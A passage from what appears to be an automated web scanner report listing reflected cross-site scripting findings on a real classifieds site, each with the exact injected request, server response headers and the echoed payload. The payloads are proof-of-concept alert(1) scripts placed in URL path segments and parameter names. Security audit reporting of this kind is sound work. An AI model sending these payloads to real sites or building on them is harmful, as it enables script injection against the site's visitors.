Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb58ca"-alert(1)-"8e650569f43/sale/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.133. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af3af"><script>alert(1)</script>2383bc7b4a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housingaf3af"><script>alert(1)</script>2383bc7b4a2/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:12 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=961547882d20431006d8d55ec5c46ae3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=f6ff5b4fb7e61d07ff00b5c57df4f4bb; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1DRjNEQUNFOTRENTBBQjJD; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzMjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housingaf3af"><script>alert(1)</script>2383bc7b4a2/sale/" />
...[SNIP]...

1.134. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743bf"><script>alert(1)</script>52416edc729 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/sale743bf"><script>alert(1)</script>52416edc729/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=7241134d9ecf06edd355e33e951acb8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=99a9d42109e00a1cc41bed07afbb7f90; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BRjk3OEI1MjRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/sale743bf"><script>alert(1)</script>52416edc729/" />
...[SNIP]...

1.135. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b04a"-alert(1)-"4c9628f7613 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/sale6b04a"-alert(1)-"4c9628f7613/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=7d33cd61f00586135bbc01d6d97811c5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=07f8cec03af577aa1f8a737e2a4722b3; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FQ0REMDVFNzRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/sale6b04a"-alert(1)-"4c9628f7613/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.136. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8051f"><script>alert(1)</script>ed0505c2ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job8051f"><script>alert(1)</script>ed0505c2ef/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=2fcc6d8406f32b4ddedd916b82be58de; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=dfc2d0d6bde6021f66f784fa161ab08e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNjY2RTk2RTRENTBBQjMx; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzNzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/job8051f"><script>alert(1)</script>ed0505c2ef/" />
...[SNIP]...

1.137. http://www.classifieds.nypost.com/job/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /job/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabde"-alert(1)-"983a4a707fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jobaabde"-alert(1)-"983a4a707fc/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3725793ad5984417584a0b67ffa68f4c; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=6c8b26b153ab3ddfad61fb4837579c0d; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FRDg3MzhCQTRENTBBQjMy; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds jobaabde"-alert(1)-"983a4a707fc/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.138. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e7c0"-alert(1)-"9d75c7c2cd1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post1e7c0"-alert(1)-"9d75c7c2cd1/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:39 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=df493d631799b3ae71a3f47afed2e73f; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=34ce2d0beacf8aab4c6971699d3feea3; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNTJCQjU1OTRENTBBQjQ3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds post1e7c0"-alert(1)-"9d75c7c2cd1/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.139. http://www.classifieds.nypost.com/post/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fce6"><script>alert(1)</script>8fbf846dde5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post1fce6"><script>alert(1)</script>8fbf846dde5/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=9c639fd8a2bc4f978acdc8be6e356431; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=5729656fe7e1ac9653ac58e5ac096a07; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1GNEMyMDNCQTRENTBBQjQ2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM1ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post1fce6"><script>alert(1)</script>8fbf846dde5/" />
...[SNIP]...

1.140. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f05d5"-alert(1)-"d62825c243a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /post/?f05d5"-alert(1)-"d62825c243a=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:32:25 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=bf5746dabc2d75a50e0a9be6b3f39b8e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=e3e0b9b8e19d41b51d5cfd5512137451; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1EMkIxOThCNTRENTBBQjM5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12147

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
t-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-post-_-post-_--_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreatePageviewTag("post ?f05d5"-alert(1)-"d62825c243a=1","10000023","","","ny-_-post-_-post-_-nypost USA-_-nypost-_-USA-_-nypost-_-post-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.141. http://www.classifieds.nypost.com/post/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /post/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23656"><script>alert(1)</script>d50798e020e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /post/?23656"><script>alert(1)</script>d50798e020e=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 08 Feb 2011 02:32:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=4a9ad5ba08b2bce98db1714f0c97b1c7; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=023646d326636dbb53314fa5866e7dcf; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FODY1REQyNzRENTBBQjM4; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/post/?23656"><script>alert(1)</script>d50798e020e=1" />
...[SNIP]...

1.142. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c98a3"-alert(1)-"0c04687f888 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salec98a3"-alert(1)-"0c04687f888/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:23 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=3e2957e9e9845ca07eb98112f1e3830e; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=3f7d92644e0d9effef47f2e0e487219b; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1BMjk1ODBEMTRENTBBQjM3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds salec98a3"-alert(1)-"0c04687f888/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.143. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d9c4"><script>alert(1)</script>e630142b13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale2d9c4"><script>alert(1)</script>e630142b13f/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=df974b08a505d83f66dd2cb252c59fac; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=031f7d9223c6547f69866b4905e1d99e; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1CQjBDM0JFNjRENTBBQjM2; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjM0Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale2d9c4"><script>alert(1)</script>e630142b13f/" />
...[SNIP]...

1.144. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44400"><script>alert(1)</script>1c630243bd9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale44400"><script>alert(1)</script>1c630243bd9/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 08 Feb 2011 02:32:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: otu=18f597758571f26182c84aac36fd15d5; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: ots=6a72bb3687c8592cbdca977e15514344; path=/; domain=.classifieds.nypost.com
Set-Cookie: a=dT1FQjQ4RTNGRTRENTBBQjMz; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.classifieds.nypost.com
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5NzEzMjMzOTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale44400"><script>alert(1)</script>1c630243bd9/pet/" />
...[SNIP]...

1.145. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91fcd"-alert(1)-"4468efc9463 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale91fcd"-alert(1)-"4468efc9463/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
